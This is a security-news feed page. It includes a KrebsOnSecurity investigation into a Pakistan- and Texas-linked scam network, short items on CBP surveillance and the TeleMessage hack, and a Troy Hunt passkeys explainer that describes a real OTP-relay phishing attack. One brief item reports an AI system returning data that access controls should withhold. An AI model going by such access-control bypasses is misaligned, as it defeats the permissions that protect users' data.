FreshRSS

☐ ☆ ✇ WIRED

US Customs and Border Protection Plans to Photograph Everyone Exiting the US by Car

By: Caroline Haskins — May 9th 2025 at 17:12
A CBP spokesperson tells WIRED that the agency plans to expand its program for real-time face recognition at the border, potentially aiding Trump administration efforts to track people who self-deport.
☐ ☆ ✇ WIRED

US Customs and Border Protection Quietly Revokes Protections for Pregnant Women and Infants

By: Dhruv Mehrotra — May 8th 2025 at 22:00
CBP’s acting commissioner has rescinded four Biden-era policies that aimed to protect vulnerable people in the agency’s custody, including mothers, infants, and the elderly.
☐ ☆ ✇ Security – Cisco Blog

AI Agent for Color Red

By: Dr. Giannis Tziakouris — May 8th 2025 at 12:00
AI can automate the analysis, generation, testing, and reporting of exploits. It's particularly relevant in penetration testing and ethical hacking scenarios.
☐ ☆ ✇ Krebs on Security

Pakistani Firm Shipped Fentanyl Analogs, Scams to US

By: BrianKrebs — May 7th 2025 at 22:22

A Texas firm recently charged with conspiring to distribute synthetic opioids in the United States is at the center of a vast network of companies in the U.S. and Pakistan whose employees are accused of using online ads to scam westerners seeking help with trademarks, book writing, mobile app development and logo designs, a new investigation reveals.

In an indictment (PDF) unsealed last month, the U.S. Department of Justice said Dallas-based eWorldTrade “operated an online business-to-business marketplace that facilitated the distribution of synthetic opioids such as isotonitazene and carfentanyl, both significantly more potent than fentanyl.”

Launched in 2017, eWorldTrade[.]com now features a seizure notice from the DOJ. eWorldTrade operated as a wholesale seller of consumer goods, including clothes, machinery, chemicals, automobiles and appliances. The DOJ’s indictment includes no additional details about eWorldTrade’s business, origins or other activity, and at first glance the website might appear to be a legitimate e-commerce platform that also just happened to sell some restricted chemicals.

A screenshot of the eWorldTrade homepage on March 25, 2025. Image: archive.org.

However, an investigation into the company’s founders reveals they are connected to a sprawling network of websites that have a history of extortionate scams involving trademark registration, book publishing, exam preparation, and the design of logos, mobile applications and websites.

Records from the U.S. Patent and Trademark Office (USPTO) show the eWorldTrade mark is owned by an Azneem Bilwani in Karachi (this name also is in the registration records for the now-seized eWorldTrade domain). Mr. Bilwani is perhaps better known as the director of the Pakistan-based IT provider Abtach Ltd., which has been singled out by the USPTO and Google for operating trademark registration scams (the main offices for eWorldtrade and Abtach share the same address in Pakistan).

In November 2021, the USPTO accused Abtach of perpetrating “an egregious scheme to deceive and defraud applicants for federal trademark registrations by improperly altering official USPTO correspondence, overcharging application filing fees, misappropriating the USPTO’s trademarks, and impersonating the USPTO.”

Abtach offered trademark registration at suspiciously low prices compared to the legitimate cost of more than $1,500, and claimed it could register a trademark in 24 hours. Abtach reportedly rebranded to Intersys Limited after the USPTO banned Abtach from filing any more trademark applications.

In a note published to its LinkedIn profile, Intersys Ltd. asserted last year that certain scam firms in Karachi were impersonating the company.

FROM AXACT TO ABTACH

Many of Abtach’s employees are former associates of a similar company in Pakistan called Axact that was targeted by Pakistani authorities in a 2015 fraud investigation. Axact came under law enforcement scrutiny after The New York Times ran a front-page story about the company’s most lucrative scam business: Hundreds of sites peddling fake college degrees and diplomas.

People who purchased fake certifications were subsequently blackmailed by Axact employees posing as government officials, who would demand additional payments under threats of prosecution or imprisonment for having bought fraudulent “unauthorized” academic degrees. This practice created a continuous cycle of extortion, internally referred to as “upselling.”

“Axact took money from at least 215,000 people in 197 countries — one-third of them from the United States,” The Times reported. “Sales agents wielded threats and false promises and impersonated government officials, earning the company at least $89 million in its final year of operation.”

Dozens of top Axact employees were arrested, jailed, held for months, tried and sentenced to seven years for various fraud violations. But a 2019 research brief on Axact’s diploma mills found none of those convicted had started their prison sentence, and that several had fled Pakistan and never returned.

“In October 2016, a Pakistan district judge acquitted 24 Axact officials at trial due to ‘not enough evidence’ and then later admitted he had accepted a bribe (of $35,209) from Axact,” reads a history (PDF) published by the American Association of Collegiate Registrars and Admissions Officers.

In 2021, Pakistan’s Federal Investigation Agency (FIA) charged Bilwani and nearly four dozen others — many of them Abtach employees — with running an elaborate trademark scam. The authorities called it “the biggest money laundering case in the history of Pakistan,” and named a number of businesses based in Texas that allegedly helped move the proceeds of cybercrime.

A page from the March 2021 FIA report alleging that Digitonics Labs and Abtach employees conspired to extort and defraud consumers.

The FIA said the defendants operated a large number of websites offering low-cost trademark services to customers, before then “ignoring them after getting the funds and later demanding more funds from clients/victims in the name of up-sale (extortion).” The Pakistani law enforcement agency said that about 75 percent of customers received fake or fabricated trademarks as a result of the scams.

The FIA found Abtach operates in conjunction with a Karachi firm called Digitonics Labs, which earned a monthly revenue of around $2.5 million through the “extortion of international clients in the name of up-selling, the sale of fake/fabricated USPTO certificates, and the maintaining of phishing websites.”

According to the Pakistani authorities, the accused also ran countless scams involving ebook publication and logo creation, wherein customers were subjected to advance-fee fraud and extortion — with the scammers demanding more money for supposed “copyright release” and threatening to release the trademark.

Also charged by the FIA was Junaid Mansoor, the owner of Digitonics Labs in Karachi. Mansoor’s U.K.-registered company Maple Solutions Direct Limited has run at least 700 ads for logo design websites since 2015, the Google Ads Transparency page reports. The company has approximately 88 ads running on Google as of today. 

Junaid Mansoor. Source: youtube/@Olevels․com School.

Mr. Mansoor is actively involved with and promoting a Quran study business called quranmasteronline[.]com, which was founded by Junaid’s brother Qasim Mansoor (Qasim is also named in the FIA criminal investigation). The Google ads promoting quranmasteronline[.]com were paid for by the same account advertising a number of scam websites selling logo and web design services. 

Junaid Mansoor did not respond to requests for comment. An address in Teaneck, New Jersey where Mr. Mansoor previously lived is listed as an official address of exporthub[.]com, a Pakistan-based e-commerce website that appears remarkably similar to eWorldTrade (Exporthub says its offices are in Texas). Interestingly, a search in Google for this domain shows ExportHub currently features multiple listings for fentanyl citrate from suppliers in China and elsewhere.

The CEO of Digitonics Labs is Muhammad Burhan Mirza, a former Axact official who was arrested by the FIA as part of its money laundering and trademark fraud investigation in 2021. In 2023, prosecutors in Pakistan charged Mirza, Mansoor and 14 other Digitonics employees with fraud, impersonating government officials, phishing, cheating and extortion. Mirza’s LinkedIn profile says he currently runs an educational technology/life coach enterprise called TheCoach360, which purports to help young kids “achieve financial independence.”

Reached via LinkedIn, Mr. Mirza denied having anything to do with eWorldTrade or any of its sister companies in Texas.

“Moreover, I have no knowledge as to the companies you have mentioned,” said Mr. Mirza, who did not respond to follow-up questions.

The current disposition of the FIA’s fraud case against the defendants is unclear. The investigation was marred early on by allegations of corruption and bribery. In 2021, Pakistani authorities alleged Bilwani paid a six-figure bribe to FIA investigators. Meanwhile, attorneys for Mr. Bilwani have argued that although their client did pay a bribe, the payment was solicited by government officials. Mr. Bilwani did not respond to requests for comment.

THE TEXAS NEXUS

KrebsOnSecurity has learned that the people and entities at the center of the FIA investigations have built a significant presence in the United States, with a strong concentration in Texas. The Texas businesses promote websites that sell logo and web design, ghostwriting, and academic cheating services. Many of these entities have recently been sued for fraud and breach of contract by angry former customers, who claimed the companies relentlessly upsold them while failing to produce the work as promised.

For example, the FIA complaints named Retrocube LLC and 360 Digital Marketing LLC, two entities that share a street address with eWorldTrade: 1910 Pacific Avenue, Suite 8025, Dallas, Texas. Also incorporated at that Pacific Avenue address is abtach[.]ae, a web design and marketing firm based in Dubai; and intersyslimited[.]com, the new name of Abtach after they were banned by the USPTO. Other businesses registered at this address market services for logo design, mobile app development, and ghostwriting.

A list published in 2021 by Pakistan’s FIA of different front companies allegedly involved in scamming people who are looking for help with trademarks, ghostwriting, logos and web design.

360 Digital Marketing’s website 360digimarketing[.]com is owned by an Abtach front company called Abtech LTD. Meanwhile, business records show 360 Digi Marketing LTD is a U.K. company whose officers include former Abtach director Bilwani; Muhammad Saad Iqbal, formerly Abtach, now CEO of Intersys Ltd; Niaz Ahmed, a former Abtach associate; and Muhammad Salman Yousuf, formerly a vice president at Axact, Abtach, and Digitonics Labs.

Google’s Ads Transparency Center shows 360 Digital Marketing LLC ran at least 500 ads promoting various websites selling ghostwriting services. Another entity tied to Junaid Mansoor — a company called Octa Group Technologies AU — has run approximately 300 Google ads for book publishing services, promoting confusingly named websites like amazonlistinghub[.]com and barnesnoblepublishing[.]co.

360 Digital Marketing LLC ran approximately 500 ads for scam ghostwriting sites.

Rameez Moiz is a Texas resident and former Abtach product manager who has represented 360 Digital Marketing LLC and RetroCube. Moiz told KrebsOnSecurity he stopped working for 360 Digital Marketing in the summer of 2023. Mr. Moiz did not respond to follow-up questions, but an Upwork profile for him states that as of April 2025 he is employed by Dallas-based Vertical Minds LLC.

In April 2025, California resident Melinda Will sued the Texas firm Majestic Ghostwriting — which is doing business as ghostwritingsquad[.]com — alleging they scammed her out of $100,000 after she hired them to help write her book. Google’s ad transparency page shows Moiz’s employer Vertical Minds LLC paid to run approximately 55 ads for ghostwritingsquad[.]com and related sites.

Google’s ad transparency listing for ghostwriting ads paid for by Vertical Minds LLC.

VICTIMS SPEAK OUT

Ms. Will’s lawsuit is just one of more than two dozen complaints over the past four years wherein plaintiffs sued one of this group’s web design, wiki editing or ghostwriting services. In 2021, a New Jersey man sued Octagroup Technologies, alleging they ripped him off when he paid a total of more than $26,000 for the design and marketing of a web-based mapping service.

The plaintiff in that case did not respond to requests for comment, but his complaint alleges Octagroup and myriad other companies it contracted with produced minimal work product despite subjecting him to relentless upselling. That case was decided in favor of the plaintiff because the defendants never contested the matter in court.

In 2023, 360 Digital Marketing LLC and Retrocube LLC were sued by a woman who said they scammed her out of $40,000 over a book she wanted help writing. That lawsuit helpfully showed an image of the office front door at 1910 Pacific Ave Suite 8025, which featured the logos of 360 Digital Marketing, Retrocube, and eWorldTrade.

The front door at 1910 Pacific Avenue, Suite 8025, Dallas, Texas.

The lawsuit was filed pro se by Leigh Riley, a 64-year-old career IT professional who paid 360 Digital Marketing to have a company called Talented Ghostwriter co-author and promote a series of books she’d outlined on spirituality and healing.

“The main reason I hired them was because I didn’t understand what I call the formula for writing a book, and I know there’s a lot of marketing that goes into publishing,” Riley explained in an interview. “I know nothing about that stuff, and these guys were convincing that they could handle all aspects of it. Until I discovered they couldn’t write a damn sentence in English properly.”

Riley’s well-documented lawsuit (not linked here because it features a great deal of personal information) includes screenshots of conversations with the ghostwriting team, which was constantly assigning her to new writers and editors, and ghosting her on scheduled conference calls about progress on the project. Riley said she ended up writing most of the book herself because the work they produced was unusable.

“Finally after months of promising the books were printed and on their way, they show up at my doorstep with the wrong title on the book,” Riley said. When she demanded her money back, she said the people helping her with the website to promote the book locked her out of the site.

A conversation snippet from Leigh Riley’s lawsuit against Talented Ghostwriter, aka 360 Digital Marketing LLC. “Other companies once they have you money they don’t even respond or do anything,” the ghostwriting team manager explained.

Riley decided to sue, naming 360 Digital Marketing LLC and Retrocube LLC, among others. The companies offered to settle the matter for $20,000, which she accepted. “I didn’t have money to hire a lawyer, and I figured it was time to cut my losses,” she said.

Riley said she could have saved herself a great deal of headache by doing some basic research on Talented Ghostwriter, whose website claims the company is based in Los Angeles. According to the California Secretary of State, however, there is no registered entity by that name. Rather, the address claimed by talentedghostwriter[.]com is a vacant office building with a “space available” sign in the window.

California resident Walter Horsting discovered something similar when he sued 360 Digital Marketing in small claims court last year, after hiring a company called Vox Ghostwriting to help write, edit and promote a spy novel he’d been working on. Horsting said he paid Vox $3,300 to ghostwrite a 280-page book, and was upsold an Amazon marketing and publishing package for $7,500.

In an interview, Horsting said the prose that Vox Ghostwriting produced was “juvenile at best,” forcing him to rewrite and edit the work himself, and to partner with a graphical artist to produce illustrations. Horsting said that when it came time to begin marketing the novel, Vox Ghostwriting tried to further upsell him on marketing packages, while dodging scheduled meetings with no follow-up.

“They have a money back guarantee, and when they wouldn’t refund my money I said I’m taking you to court,” Horsting recounted. “I tried to serve them in Los Angeles but found no such office exists. I talked to a salon next door and they said someone else had recently shown up desperately looking for where the ghostwriting company went, and it appears there are a trail of corpses on this. I finally tracked down where they are in Texas.”

It was the same office at which Ms. Riley had served her lawsuit. Horsting said he has a court hearing scheduled later this month, but he’s under no illusions that winning the case means he’ll be able to collect.

“At this point, I’m doing it out of pride more than actually expecting anything to come to good fortune for me,” he said.

The following mind map was helpful in piecing together key events, individuals and connections mentioned above. It’s important to note that this graphic only scratches the surface of the operations tied to this group. For example, in Case 2 we can see mention of academic cheating services, wherein people can be hired to take online proctored exams on one’s behalf. Those who hire these services soon find themselves subject to impersonation and blackmail attempts for larger and larger sums of money, with the threat of publicly exposing their unethical academic cheating activity.

A “mind map” illustrating the connections between and among entities referenced in this story. Click to enlarge.

GOOGLE RESPONDS

KrebsOnSecurity reviewed the Google Ad Transparency links for nearly 500 different websites tied to this network of ghostwriting, logo, app and web development businesses. Those website names were then fed into spyfu.com, a competitive intelligence company that tracks the reach and performance of advertising keywords. Spyfu estimates that between April 2023 and April 2025, those websites spent more than $10 million on Google ads.

Reached for comment, Google said in a written statement that it is constantly policing its ad network for bad actors, pointing to an ads safety report (PDF) showing Google blocked or removed 5.1 billion bad ads last year — including more than 500 million ads related to trademarks.

“Our policy against Enabling Dishonest Behavior prohibits products or services that help users mislead others, including ads for paper-writing or exam-taking services,” the statement reads. “When we identify ads or advertisers that violate our policies, we take action, including by suspending advertiser accounts, disapproving ads, and restricting ads to specific domains when appropriate.”

Google did not respond to specific questions about the advertising entities mentioned in this story, saying only that “we are actively investigating this matter and addressing any policy violations, including suspending advertiser accounts when appropriate.”

From reviewing the ad accounts that have been promoting these scam websites, it appears Google has very recently acted to remove a large number of the offending ads. Prior to my notifying Google about the extent of this ad network on April 28, the Google Ad Transparency network listed over 500 ads for 360 Digital Marketing; as of this publication, that number had dwindled to 10.

On April 30, Google announced that starting this month its ads transparency page will display the payment profile name as the payer name for verified advertisers, if that name differs from their verified advertiser name. Searchengineland.com writes the changes are aimed at increasing accountability in digital advertising.

This spreadsheet lists the domain names, advertiser names, and Google Ad Transparency links for more than 350 entities offering ghostwriting, publishing, web design and academic cheating services.

KrebsOnSecurity would like to thank the anonymous security researcher NatInfoSec for their assistance in this investigation.

For further reading on Abtach and its myriad companies in all of the above-mentioned verticals (ghostwriting, logo design, etc.), see this Wikiwand entry.

☐ ☆ ✇ WIRED

Customs and Border Protection Confirms Its Use of Hacked Signal Clone TeleMessage

By: Lily Hay Newman — May 7th 2025 at 21:03
CBP says it has “disabled” its use of TeleMessage following reports that the app, which has not cleared the US government’s risk assessment program, was hacked.
☐ ☆ ✇ WIRED

The Trump Administration Sure Is Having Trouble Keeping Its Comms Private

By: Zoë Schiffer, Lily Hay Newman — May 7th 2025 at 18:08
In the wake of SignalGate, a knockoff version of Signal used by a high-ranking member of the Trump administration was hacked. Today on Uncanny Valley, we discuss the platforms used for government communications.
☐ ☆ ✇ /r/netsec - Information Security News & Discussion

Known Exploited Vulnerabilities Intel

By: /u/ethicalhack3r — May 7th 2025 at 10:40

The site displays known exploited vulnerabilities (KEVs) that have been cataloged from over 50 public sources, including CISA, and (once we get some hits) my own private sensors.

Each entry links to a CVE identifier, where the CVE details are enriched with EPSS scores, online mentions, scanner inclusion, exploitation, and other metadata.

The goal is to be an early warning system, flagging exploited vulnerabilities even before they are published by CISA.

Includes open public JSON API, CSV download and RSS feed.
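The post doesn't document the site's own API endpoints, so as a rough illustration of consuming this kind of feed, here is a minimal Python sketch (an assumption, not the site's API) that pulls CISA's public KEV catalog, one of the sources the site says it aggregates, and prints entries added in the last week. The URL and field names such as `cveID` and `dateAdded` reflect the catalog at the time of writing and may change.

```python
# Minimal sketch: fetch CISA's KEV catalog and list recently added entries.
# This illustrates consuming a KEV-style feed; it is not the site's own API.
from datetime import date, timedelta
import json
import urllib.request

KEV_URL = (
    "https://www.cisa.gov/sites/default/files/feeds/"
    "known_exploited_vulnerabilities.json"
)

def recent_kevs(days: int = 7) -> list[dict]:
    """Return KEV entries added to the CISA catalog within the last `days` days."""
    with urllib.request.urlopen(KEV_URL, timeout=30) as resp:
        catalog = json.load(resp)
    cutoff = date.today() - timedelta(days=days)
    return [
        vuln for vuln in catalog.get("vulnerabilities", [])
        if date.fromisoformat(vuln["dateAdded"]) >= cutoff
    ]

if __name__ == "__main__":
    for v in recent_kevs():
        print(f'{v["dateAdded"]}  {v["cveID"]}  '
              f'{v.get("vendorProject", "")} {v.get("product", "")}')
```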

☐ ☆ ✇ /r/netsec - Information Security News & Discussion

We Got Tired of Labs NOT preparing us for Real Targets… So We Built This (Seeking Beta Feedback!)

By: /u/RogueSMG — May 7th 2025 at 09:14

Quick intro: I've been kicking around in infosec for about 5 years now, starting with Pentesting and later focusing mainly on bug bounties full-time for the last 3 or so (some might know me as RogueSMG from Twitter, or YouTube back in the day). My co-founder Kuldeep Pandya has been deep in it too (you might have seen his stuff at kuldeep.io).

TL;DR: Built "Barracks Social," a FREE, realistic social media sim WarZone to bridge the lab-to-real-world gap (evolving, no hints, reporting focus). Seeking honest beta feedback! Link: https://beta.barracks.army

Like many of you, we constantly felt that frustrating jump from standard labs/CTFs to the complexity and chaos of Real-World targets. We've solved numerous Labs and played a few CTFs - but still couldn't feel "confident enough" to pick a Target and just Start Hacking. It felt like the available practice didn't quite build the right instincts.

To try and help bridge that gap, we started Barracks and built our first WarZone concept: "Barracks Social".

It's a simulated Social Networking site seeded with vulnerabilities inspired by Real-World reports, including vulns we've personally found as well as ones from community writeups. We designed it to be different:

  • No Hand-Holding: Explore, Recon, find vulns organically. No hints.
  • It Evolves: Simulates patches/updates based on feedback, so the attack surface changes.
  • Reporting Focus: Designed to practice writing clear, detailed reports.

We just launched the early Beta Platform with Barracks Social, and it's completely FREE to use, now and permanently. We're committed to keeping foundational training accessible and plan to release more free WarZones regularly too.

I'm NOT selling anything with this Post; We're just genuinely looking for feedback from students, learners, and fellow practitioners on this first free WarZone. Does this realistic approach help build practical skills? What works? What's frustrating?

It's definitely Beta (built by our small team!), expect rough edges.

If you want to try a different practice challenge and share your honest thoughts, access the free beta here:

Link: https://beta.barracks.army
For more details -> https://barracks.army

Happy to answer any questions in the comments! What are your biggest hurdles moving from labs to live targets?

☐ ☆ ✇ WIRED

The Signal Clone Mike Waltz Was Caught Using Has Direct Access to User Chats

By: Lily Hay Newman — May 6th 2025 at 20:24
A new analysis of TM Signal’s source code appears to show that the app sends users’ message logs in plaintext. At least one top Trump administration official used the app.
☐ ☆ ✇ WIRED

Tulsi Gabbard Reused the Same Weak Password on Multiple Accounts for Years

By: Tim Marchman — May 6th 2025 at 19:27
Now the US director of national intelligence, Gabbard failed to follow basic cybersecurity practices on several of her personal accounts, leaked records reviewed by WIRED reveal.
☐ ☆ ✇ WIRED

US Border Agents Are Asking for Help Taking Photos of Everyone Entering the Country by Car

By: Caroline Haskins — May 6th 2025 at 09:00
Customs and Border Protection has called for tech companies to pitch real-time face recognition technology that can capture everyone in a vehicle—not just those in the front seats.
☐ ☆ ✇ /r/netsec - Information Security News & Discussion

Snowflake’s AI Bypasses Access Controls

By: /u/Affectionate-Win6936 — May 6th 2025 at 05:25

Snowflake’s Cortex AI can return data that the requesting user shouldn’t have access to — even when proper Row Access Policies and RBAC are in place.

☐ ☆ ✇ WIRED

Signal Clone Used by Mike Waltz Pauses Service After Reports It Got Hacked

By: Lily Hay Newman — May 5th 2025 at 21:24
The communications app TeleMessage, which was spotted on former US national security adviser Mike Waltz's phone, has suspended “all services” as it investigates reports of at least one breach.
☐ ☆ ✇ Security – Cisco Blog

Automate Forensics to Eliminate Uncertainty

By: Rajat Gulati — May 5th 2025 at 12:00
Discover how Cisco XDR delivers automated forensics and AI-driven investigation—bringing speed, clarity, and confidence to SecOps teams.
☐ ☆ ✇ WIRED

Security Researchers Warn a Widely Used Open Source Tool Poses a 'Persistent' Risk to the US

By: Matt Burgess — May 5th 2025 at 10:00
The open source software easyjson is used by the US government and American companies. But its ties to Russia’s VK, whose CEO has been sanctioned, have researchers sounding the alarm.
☐ ☆ ✇ Troy Hunt

Passkeys for Normal People

By: Troy Hunt — May 5th 2025 at 08:12

Let me start by very simply explaining the problem we're trying to solve with passkeys. Imagine you're logging on to a website like this:

And, because you want to protect your account from being logged into by someone else who may obtain your username and password, you've turned on two-factor authentication (2FA). That means that even after entering the correct credentials in the screen above, you're now prompted to enter the six-digit code from your authenticator app:

There are a few different authenticator apps out there, but what they all have in common is that they display a one-time password (henceforth referred to as an OTP) with a countdown timer next to it:

Because an OTP is only valid for a short period of time, anyone who obtains it has a very narrow window in which to use it. Besides, who can possibly obtain it from your authenticator app anyway?! Well... that's where the problem lies, and I demonstrated this just recently, not intentionally, but rather entirely by accident when I fell victim to a phishing attack. Here's how it worked:

  1. I was socially engineered into visiting a phishing page that pretended to belong to Mailchimp who I use to send newsletters for this blog. The website address was mailchimp-sso.com, which was close enough to the real address (mailchimp.com) to be feasible. "SSO" is "single sign on", so also seemed feasible.
  2. When I saw the login screen (the one with the big "PHISH" stamp on it), and submitted my username and password to them, the phishing site then automatically used those credentials to begin the login process on Mailchimp.
  3. Mailchimp validated the credentials, and because I had 2FA turned on, then displayed the OTP request screen.
  4. The legitimate OTP screen from Mailchimp was then returned to the bad guys...
  5. ...who responded to my login request with their own page requesting the OTP.
  6. I entered the code into the form and submitted it to the phishing site.
  7. The bad guys then immediately sent that request to Mailchimp, thus successfully logging themselves in.

The problem with OTPs from authenticator apps (or sent via SMS) is that they're phishable in that it's possible for someone to trick you into handing one over. What we need instead is a "phishing-resistant" paradigm, and that's precisely what passkeys are. Let's look at how to set them up, how to use them on websites and in mobile apps, and talk about what some of their shortcomings are.
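Before walking through setup, here is a deliberately simplified sketch of the core idea, using the Python `cryptography` package. Real passkeys use the WebAuthn protocol, which adds attestation, authenticator data and much more; the point of the sketch is only that the site stores a public key, the device signs a fresh challenge together with the origin the browser is actually on, and a response produced on a lookalike domain (like the mailchimp-sso.com page described above) therefore fails verification on the real site.

```python
# Simplified sketch of why passkeys resist phishing (not the real WebAuthn protocol).
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
import os

# Registration: the device creates a key pair; the site stores only the public key.
device_key = Ed25519PrivateKey.generate()        # stays on the device / in the password manager
registered_origin = "https://mailchimp.com"
server_public_key = device_key.public_key()

def client_sign(challenge: bytes, origin_browser_is_on: str) -> bytes:
    # The signature covers the origin the browser is actually on, so a response
    # produced on a phishing page is bound to that phishing origin.
    return device_key.sign(challenge + origin_browser_is_on.encode())

def server_verify(signature: bytes, challenge: bytes) -> bool:
    # The real site only accepts signatures over the challenge plus its own origin.
    try:
        server_public_key.verify(signature, challenge + registered_origin.encode())
        return True
    except InvalidSignature:
        return False

challenge = os.urandom(32)   # fresh per login, so there is no static secret to steal or replay
print(server_verify(client_sign(challenge, "https://mailchimp.com"), challenge))      # True
print(server_verify(client_sign(challenge, "https://mailchimp-sso.com"), challenge))  # False
```

Unlike an OTP, there is nothing the user can type into the wrong website: the only thing that ever leaves the device is a signature bound to a specific origin and a single challenge.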

Passkeys for Log In on Mobile with WhatsApp

We'll start by setting one up for WhatsApp given I got a friendly prompt from them to do this recently:

So, let's "Try it" and walk through the mechanics of what it means to setup a passkey. I'm using an iPhone, and this is the screen I'm first presented with:

A passkey is simply a digital file you store on your device. It has various cryptographic protections in the way it is created and then used to login, but that goes beyond the scope of what I want to explain to the audience in this blog post. Let's touch briefly on the three items WhatsApp describes above:

  1. The passkey will be used to logon to the service
  2. It works in conjunction with how you already authenticate to your device
  3. It needs to be stored somewhere (remember, it's a digital file)

That last point can be very device-specific and very user-specific. Because I have an iPhone, WhatsApp is suggesting I save the passkey into my iCloud Keychain. If you have an Android, you're obviously going to see a different message that aligns to how Google syncs passkeys. Choosing one of these native options is your path of least resistance - a couple of clicks and you're done. However...

I have lots of other services I want to use passkeys on, and I want to authenticate to them both from my iPhone and my Windows PC. For example, I use LinkedIn across all my devices, so I don't want my passkey tied solely to my iPhone. (It's a bit clunky, but some services enable this by using the mobile device your passkey is on to scan a QR code displayed on a web page). And what if one day I switch from iPhone to Android? I'd like my passkeys to be more transferable, so I'm going to store them in my dedicated password manager, 1Password.

A quick side note: as you'll read in this post, passkeys do not necessarily replace passwords. Sometimes they can be used as a "single factor" (the only thing you use to login with), but they may also be used as a "second factor" with the first being your password. This is up to the service implementing them, and one of the criticisms of passkeys is that your experience with them will differ between websites.

We still need passwords, we still want them to be strong and unique, therefore we still need password managers. I've been using 1Password for 14 years now (full disclosure: they sponsor Have I Been Pwned, and often sponsor this blog too) and as well as storing passwords (and credit cards and passport info and secure notes and sharing it all with my family), they can also store passkeys. I have 1Password installed on my iPhone and set as the default app to autofill passwords and passkeys:

Because of this, I'm given the option to store my WhatsApp passkey directly there:

The obfuscated section is the last four digits of my phone number. Let's "Continue", and then 1Password pops up with a "Save" button:

Once saved, WhatsApp displays the passkey that is now saved against my account:

And because I saved it into 1Password that syncs across all my devices, I can jump over to the PC and see it there too.

And that's it, I now have a passkey for WhatsApp which can be used to log in. I picked this example as a starting point given the massive breadth of the platform and the fact I was literally just prompted to create a passkey (the very day my Mailchimp account was phished, ironically). Only thing is, I genuinely can't see how to log out of WhatsApp so I can then test using the passkey to login. Let's go and create another with a different service and see how that experience differs.

Passkeys For Log In via PC with LinkedIn

Let's pick another example, and we'll set this one up on my PC. I'm going to pick a service that contains some important personal information, which would be damaging if it were taken over. In this case, the service has also previously suffered a data breach themselves: LinkedIn.

I already had two-step verification enabled on LinkedIn, but as evidenced in my own phishing experience, this isn't always enough. (Note: the terms "two-step", "two-factor" and "multi-factor" do have subtle differences, but for the sake of simplicity, I'll treat them as interchangeable terms in this post.)

Onto passkeys, and you'll see similarities between LinkedIn's and WhatsApp's descriptions. An important difference, however, is LinkedIn's comment about not needing to remember complex passwords:

Let's jump into it and create that passkey, but just before we do, keep in mind that it's up to each and every different service to decide how they implement the workflow for creating passkeys. Just like how different services have different rules for password strength criteria, the same applies to the mechanics of passkey creation. LinkedIn begins by requiring my password again:

This is part of the verification process to ensure someone other than you (for example, someone who can sit down at your machine that's already logged into LinkedIn) can't add a new way of accessing your account. I'm then prompted for a 6-digit code:

Which has already been sent to my email address, thus verifying I am indeed the legitimate account holder:

As soon as I enter that code in the website, LinkedIn pushes the passkey to me, which 1Password then offers to save:

Again, your experience will differ based on which device and preferred method of storing passkeys you're using. But what will always be the same for LinkedIn is that you can then see the successfully created passkey on the website:

Now, let's see how it works by logging out of LinkedIn and then returning to the login page. Immediately, 1Password pops up and offers to sign me in with my passkey:

That's a one-click sign-in, and clicking the purple button immediately grants me access to my account. Not only will 1Password not let me enter the passkey into a phishing site, but due to the technical implementation of the keys, it would be completely unusable even if it were submitted to a nefarious party. Let me emphasise something really significant about this process:

Passkeys are one of the few security constructs that make your life easier, rather than harder.

However, there's a problem: I still have a password on the account, and I can still log in with it. What this means is that LinkedIn has decided (and, again, this is one of those website-specific decisions) that a passkey merely represents a parallel means of logging in. It doesn't replace the password, nor can it be used as a second factor. Even after generating the passkey, only two options are available for that second factor:

The risk here is that you can still be tricked into entering your password into a phishing site, and per my Mailchimp example, your second factor (the OTP generated by your authenticator app) can then also be phished. This is not to say you shouldn't use a passkey on LinkedIn, but whilst you still have a password and phishable 2FA, you're still at risk of the same sort of attack that got me.

Passkeys for 2FA with Ubiquiti

Let's try one more example, and this time, it's one that implements passkeys as a genuine second factor: Ubiquiti.

Ubiquiti is my favourite manufacturer of networking equipment, and logging onto their system gives an enormous amount of visibility into my home network. When originally setting up that account many years ago, I enabled 2FA with an OTP and, as you now understand, ran the risk of it being phished. But just the other day I noticed passkey support and a few minutes later, my Ubiquiti account in 1Password looked like this:

I won't bother running through the setup process again because it's largely similar to WhatsApp and LinkedIn, but I will share just what it looks like to now login to that account, and it's awesome:

I intentionally left this running at real-time speed to show how fast the login process is with a password manager and passkey (I've blanked out some fields with personal info in them). That's about seven seconds from when I first interacted with the screen to when I was fully logged in with a strong password and second factor. Let me break that process down step by step:

  1. When I click on the "Email or Username" field, 1Password suggests the account to be logged in with.
  2. I click on the account I want to use and 1Password validates my identity with Face ID.
  3. 1Password automatically fills in my credentials and submits the form.
  4. Ubiquiti asks for my passkey, I click "Continue" and my iPhone uses Face ID again to ensure it's really me.
  5. The passkey is submitted to Ubiquiti and I'm successfully logged in. (As it was my first login via Chrome on my iPhone, Ubiquiti then asks if I want to trust the device, but that happens after I'm already successfully logged in.)

Now, remember "the LinkedIn problem" where you were still stuck with phishable 2FA? Not so with Ubiquiti, who allowed me to completely delete the authenticator app:

But there's one more thing we can do here to strengthen everything up further, and that's to get rid of email authentication and replace it with something even stronger than a passkey: a U2F key.

Physical Universal 2 Factor Key for 2FA with Ubiquiti

Whilst passkeys themselves are considered non-phishable, what happens if the place you store that digital key gets compromised? Your iCloud Keychain, for example, or your 1Password account. If you configure and manage these services properly then the likelihood of that happening is extremely remote, but the possibility remains. Let's add something entirely different now, and that's a physical security key:

This is a YubiKey, and you can store your digital passkey on it. It needs to be purchased and as of today, that's about a US$60 investment for a single key. YubiKeys are a brand of "Universal 2 Factor" or U2F keys, and the one above (that's a 5C NFC) can either plug into a device with USB-C or be held next to a phone with NFC (that's "near field communication", a short-range wireless technology that requires devices to be a few centimetres apart). Yubico isn't the only maker of U2F keys, but the YubiKey name has become synonymous with the technology.

Back to Ubiquiti, and when I attempt to remove email authentication, the following prompt stops me dead in my tracks:

I don't want email authentication because that involves sending a code to my email address and, well, we all know what happens when we're relying on people to enter codes into login forms 🤔 So, let's now walk through the Ubiquiti process and add another passkey as a second factor:

But this time, when Chrome pops up and offers to save it in 1Password, I'm going to choose the little USB icon at the top of the prompt instead:

Windows then gives me a prompt to choose where I wish to save the passkey, which is where I choose the security key I've already inserted into my PC:

Each time you begin interacting with a U2F key, it requires a little tap:

And a moment later, my digital passkey has been saved to my physical U2F key:

Just as you can save your passkey to Apple's iCloud Keychain or in 1Password and sync it across your devices, you can also save it to a physical key. And that's precisely what I've now done - saved one Ubiquiti passkey to 1Password and one to my YubiKey. Which means I can now go and remove email authentication, but it does carry a risk:

